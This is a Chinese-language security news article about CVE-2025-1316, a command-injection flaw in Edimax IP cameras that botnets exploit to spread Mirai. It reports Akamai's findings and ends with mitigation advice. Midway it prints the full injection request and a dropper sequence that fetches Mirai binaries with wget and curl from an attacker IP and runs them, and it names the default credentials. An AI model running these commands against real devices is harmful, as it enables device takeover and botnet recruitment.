Edimax摄像头RCE漏洞被利用传播Mirai恶意软件

2025-04-03 0 3,481

在现代社会,**物联网*设备的普及为我们的生活带来了便利,但与此同时,它们也成为网络犯罪分子攻击的重点目标。最近,Akamai安全情报和响应团队(SIRT)发布的警报指出,Edimax物联网设备中存在一个严重的命令注入漏洞,该漏洞被多个僵尸网络利用以传播Mirai恶意软件**。此漏洞被标记为CVE-2025-1316,且已被证实是一个持续存在的危险,影响了一系列Edimax设备,使用户面临严重的安全风险。

Mirai恶意软件以其能够妥协物联网设备并发动分布式拒绝服务(DDoS)攻击而臭名昭著。CVE-2025-1316漏洞具体针对Edimax设备中的 /camera-cgi/admin/param.cgi 端点,攻击者可以利用此漏洞在 ipcamSource 参数的 NTP_serverName 选项中注入命令。若要成功利用此漏洞,攻击者通常会使用如 admin:1234 这样的默认凭据。尽管该漏洞特别提到Edimax的IC-7100网络摄像头,但它可能影响更广泛范围的Edimax设备。

Akamai SIRT最早在2024年10月的蜜罐中检测到针对该漏洞的活动,而理论上的利用代码早在2023年6月就已经存在。最早的攻击尝试发生在2024年5月,随着时间的推移,在2024年9月以及2025年1月至2月期间,这种活动达到了高峰。这些攻击主要由不同的僵尸网络进行,包括Mirai的变种。

为了向大家展示危害,以下是利用该漏洞的一个示例攻击代码。这段代码注入命令以在设备上执行一个shell脚本:

/camera-cgi/admin/param.cgi action=update&ipcamSource=/ntp.asp?r=20130724&NTP_enable=1&NTP_serverName=;$(cd /tmp; wget http://193.143.1[.]118/curl.sh; chmod 777 curl.sh; sh curl.sh)&NTP_tzCityNo=16&NTP_tzMinute=0&NTP_daylightSaving=0

这一脚本下载并执行一个不同架构的Mirai恶意软件变体,包括ARM、MIPS和x86。这一过程涉及几个命令的执行,确保恶意软件的顺利下载安装。例如,命令行中可能会包含:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;

wget http://193.143.1[.]118/x86;

curl -O http://193.143.1[.]118/x86;

cat x86 > OSGt;

chmod +x *;

./OSGt joined;

rm -rf OSGt

相似的命令适用于其他架构。此次攻击中发现有两个不同的僵尸网络在利用此漏洞。第一个僵尸网络利用漏洞下载并执行一个名为 curl.sh 的脚本,通过 angela.spklove[.]com 的命令控制(C2)服务器与外部进行通信,该恶意软件在执行时会打印出“VagneRHere”的信息。第二个僵尸网络则下载并运行一个名为 wget.sh 的脚本,其中执行的 Mirai恶意软件 具有反调试功能,并在执行时打印出“Hello, World!”。

这两个僵尸网络都利用了多个已知的漏洞,包括Docker API漏洞和影响TOTOLINK设备的CVE-2024-7214。随着Mirai恶意软件的遗产继续影响物联网安全,及时了解相关威胁并采取有效的应对措施显得尤为重要。

为了保护自己免受这些威胁,用户应采取以下措施:首先,升级受影响的设备,将过时或易受攻击的设备替换为新型号;其次,确保所有设备使用强大且独特的密码,以防止简单的暴力破解攻击;同时,监控网络流量,以检测可疑活动,例如异常的流量模式;最后,实施安全措施,使用防火墙和入侵检测系统来阻止利用漏洞的尝试。

Mirai恶意软件的持续演变以及Edimax物联网设备遭到不断利用的事实,突显了与遗留固件相关的风险以及对用户隐私和安全的重大威胁。 网络安全并不是一项可以轻视的任务,保护自身设备和用户数据需要持续的努力和警惕。时代在发展,网络安全的威胁形式也在不断变化,这就要求我们与时俱进,随时准备应对新兴的网络攻击,以保护我们的数字资产不被侵害。在这个快速发展的技术环境中,只有建立强大的安全基础,才能确保我们在拥抱科技的同时,也能抵御潜在的网络氛围中滋生的威胁。

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

注:在使用本系统时,使用方必须在国家相关法律法规范围内并经过国家相关部门的授权许可,禁止用于一切非法行为。使用用途仅限于测试、实验、研究为目的,禁止用于一切商业运营,本团队不承担使用者在使用过程中的任何违法行为负责。

83源码 资讯动态 Edimax摄像头RCE漏洞被利用传播Mirai恶意软件 https://www.83ym.com/211.html

认准唯一TG:@ym830

常见问题
  • 站内所有资源,针对不同等级VIP会员可直接下载,特殊资源商品会注明是否免费,指会员所享有根据选择购买的会员选项所享有的特殊服务,具体以本站公布的服务内容为准。
查看详情
  • 按照我国的法律规定,运营网络棋牌首先需要成立一个注册正规备案的公司,然后申请网站备案、文网文、ICP等等,这些证件缺一不可。 一.注册公司 在当地工商进行注册,公司名称以“XX科技有限公司”为名,如:富裕棋牌经营范围填写“计算机软硬件、网络设备的设计开发与购销”。 二.域名及网站备案 在国内从事网站经营活动就必须经过相关部门的备案,因此棋牌运营商在购买了域名后,就要到当地网监局办理网站备案,或者请服务器提供商代为备案。 三.申请文网文 文网文全称为网络文化经营许可证,是从事经营性互联网文化活动所必需的资质。一般是需要到当地省一级(省、直辖市、自治区)的文化行政部门提出申请,并经由当地的文化行政部门合法批准。次资质要求申请公司注册资金必需达到1000万,并提供游戏版权证明文件。 四.申请ICP ICP又称为增值电信业务许可证,所有网络游戏运营商均需要办理ICP许可证,此证件要求公司注册资金1000万,需到当地市级通讯管理局办理。 五.申请文网游——游戏备案 根据《网络游戏管理暂行办法》(文化部第49号)的规定,国产网络游戏在上网运营之日起30日内应当按规定向国务院文化行政部门履行备案手续。 以上就是网络棋牌游戏正规运营所必需的资质证明。一般作为正规有实力的棋牌游戏开发公司,不光要具备所有的正规资质,而且会对投资者、代理商等合作伙伴给予相关指导和协助,与合作伙伴携手共赢!
查看详情

相关文章

猜你喜欢
官方客服团队

为您解决烦忧 - 24小时在线 专业服务